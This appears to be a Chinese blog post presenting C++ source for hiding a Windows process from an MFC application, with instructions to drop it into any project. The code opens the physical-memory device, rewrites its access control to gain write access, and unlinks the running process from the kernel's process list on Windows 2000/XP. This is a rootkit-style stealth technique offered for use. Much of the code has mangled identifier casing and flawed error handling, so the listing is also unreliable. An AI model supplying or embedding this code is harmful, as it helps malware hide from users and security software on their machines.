wsyscheck
MFC隐藏进程
只要把cpp和h加入工程,include就可以了。
代码地址:
//------------------HideProcess.h--------------------
//加入MFC工程调用即可
BOOL HideProcess();
//------------------HideProcess.cpp------------------
#include "stdafx.h"
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>
#include"HideProcess.h"
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_denied ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _unicode_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INsensitive 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_handle 0x00000200L
#define OBJ_valid_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMAPPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
g_hNtDLL = loadlibrary("ntdll.dll");
if (NULL == g_hNtDLL)
return false;
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");
return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
if(NULL != g_hNtDLL)
{
FreeLibrary(g_hNtDLL);
}
g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
Dword dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
NULL, NULL, &pDacl, NULL, &pSD);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
{
localFree(pSD);
}
if(pNewDacl)
{
LocalFree(pNewDacl);
}
}
explicit_ACCESS ea;
Rtlzeromemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccesspermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
{
LocalFree(pSD);
}
if(pNewDacl)
{
LocalFree(pNewDacl);
}
}
dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
{
LocalFree(pSD);
}
if(pNewDacl)
{
LocalFree(pNewDacl);
}
}
}
//---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);
if (5 != g_osvi.dwMajorVersion)
{
return NULL;
}
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
if(!NT_SUCCESS(status))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr;
PGDE = BaseAddress[VAddr>>22];
if (0 == (PGDE&1))
{
return 0;
}
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
{
return 0;
}
PAddr = (PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys&0xfffff000, 0x1000);
if (0 == tmp)
{
return 0;
}
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (0 == tmp)
{
return FALSE;
}
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1;
}
//---------------------------------------------------------------------------
BOOL YHideProcess()
{
// SetUnhandledExceptionFilter(exeception);
if (FALSE == InitNTDLL())
{
return FALSE;
}
if (0 == OpenPhysicalMemory())
{
return FALSE;
}
ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}
if (1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);
CloseHandle(g_hMPM);
CloseNTDLL();
return TRUE;
}
BOOL HideProcess()
{
static BOOL b_hide = false;
if (!b_hide)
{
b_hide = true;
YHideProcess();
return TRUE;
}
return TRUE;
}
这样在example的Example.h中加入
#include <HideProcess.h>
在xample的Example.cpp中
BOOL CExampleApp::Initinstance()
加入
HideProcess();
即可。
-------
文章最后发布于: 2016-06-06 12:19:39
相关阅读
最近发现 win7 任务栏左侧没有 显示桌面 功能很不方便。上网搜一个在任务栏左侧加上 显示桌面 的方法。 新建一个记事本,在里面输
定时任务ScheduledThreadPoolExecutor的使用详解
定时任务ScheduledThreadPoolExecutor的使用详解 前短时间需要用到一个定时器处理蓝牙设备接收的数据,并且需要处
转自:http://blog.chinaunix.net/uid-25785357-id-3434344.html使用crontab你可以在指定的时间执行一个shell脚本或者一系列Linux
提升进程权限-OpenProcessToken等函数的用法 GetCurrentProcessID 得到当前进程的ID OpenProcessToken 得到进程的令牌句柄 Lo
width: 100%; word-break: break-all; text-overflow: ellipsis; display: -webkit-box; /**